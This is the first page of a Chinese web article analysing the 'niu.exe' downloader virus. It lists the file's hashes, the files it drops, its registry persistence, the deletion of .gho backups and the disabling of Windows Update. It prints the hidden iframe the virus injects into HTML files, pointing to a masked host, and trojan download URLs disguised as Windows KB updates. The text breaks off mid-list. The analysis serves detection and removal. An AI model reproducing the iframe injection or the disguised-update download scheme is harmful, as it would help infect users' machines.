多功能感染下载者niu.exe病毒解决办法及niu.exe专杀

<BR><P><FONT size=3><STRONG>多功能感染下载者niu.exe病毒是什么：</STRONG></FONT></P>
<P>File: niu.exe<BR>Size: 36141 bytes<BR>MD5: 1E3096FAE27F2E81F0AA73FFFA5171B0<BR>SHA1: BF1639F93B2B6E6E69A32FA6ECEC8ABDB94AC7CF<BR>CRC32: C9ACBC14</P>
<P><STRONG><FONT size=3>多功能感染下载者niu.exe病毒中毒症状：</FONT></STRONG></P>
<P>文件变化:<BR>释放文件C:\WINDOWS\system32\crsss.exe<BR>在每个分区下面释放<BR>autorun.inf和niu.exe 右键菜单无变化</P>
<P>遍历所有分区的htm文件<BR>在其后面 插入代码<IFRAME src="http://www.xxxxxx.cn/htm/htm.htm" width=0 height=0></IFRAME><BR>遍历所有分区 删除*.gho文件<BR>删除C:\WINDOWS\system32\verclsid.exe</P>
<P>注册表变化<BR>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\</P>
<P>CurrentVersion\Run<BR>下添加<CRSSS><?XML:NAMESPACE PREFIX = C /><C:\WINDOWS\system32\crsss.exe>&nbsp;&nbsp;&nbsp; [] 达到开机启动的目的<BR>修改HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\</C:\WINDOWS\system32\crsss.exe></P>
<P><C:\WINDOWS\system32\crsss.exe>Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue<BR>为0x00000001<BR>达到 屏蔽隐藏文件显示的目的<BR>在HKEY_CURRENT_USER\Software\Microsoft\Windows\</C:\WINDOWS\system32\crsss.exe></P>
<P><C:\WINDOWS\system32\crsss.exe>CurrentVersion\Policies\WindowsUpdate下面增加<BR>DisableWindowsUpdateAccess键 并把其键值设为00000001 关闭windows自动更新功能</P>
<P>如果无连接网络 还有如下变化<BR>不断暴力写HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page为 www.hao123.com<BR>并且修改HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage 的值为00000001<BR>使得IE主页修改按钮失效</P>
<P>如果连接网络则为如下变化<BR>下载http://www.xxxxxx.cn/htm/IEURL.txt到系统文件夹<BR>该文本内为一网址 那么上面的被修改的主页则变为此文本中的网址</P>
<P>下载http://www.xxxxxx.cn/htm/exe.txt到系统文件夹 读取里面的内容<BR>下载木马<BR>http://www.xxxxxx.cn/xp/WindowsXP-KB888303-x86-CHS.exe<BR>http://www.xxxxxx.cn/xp/WindowsXP-KB838201-x86-CHS.exe<BR>http://www.xxxxxx.cn/xp/WindowsXP-KB284303-x86-CHS.exe<BR>http://www.xxxxxx.cn/xp/WindowsXP-KB398305-x86-CHS.exe<BR>http://www.xxxxxx.cn/xp/WindowsXP-KB983306-x86-CHS.exe<BR>http://www.xxxxxx.cn/xp/WindowsXP-KB828301-x86-CHS.exe<BR>http://www.xxxxxx.cn/xp/WindowsXP-KB328207-x86-CHS.exe<BR>http://www.xxxxxx.cn/x</p><p align='center'><b><font color='red'>[1]</font>&nbsp;<a href='http://www.hotbus.cn/it/200708/2687_2.html'>[2]</a>&nbsp;<a href='http://www.hotbus.cn/it/200708/2687_3.html'>[3]</a>&nbsp;<a href='http://www.hotbus.cn/it/200708/2687_4.html'>[4]</a>&nbsp;<a href='http://www.hotbus.cn/it/200708/2687_5.html'>[5]</a>&nbsp;<a href='http://www.hotbus.cn/it/200708/2687_2.html'>下一页</a> </b></p> <BR>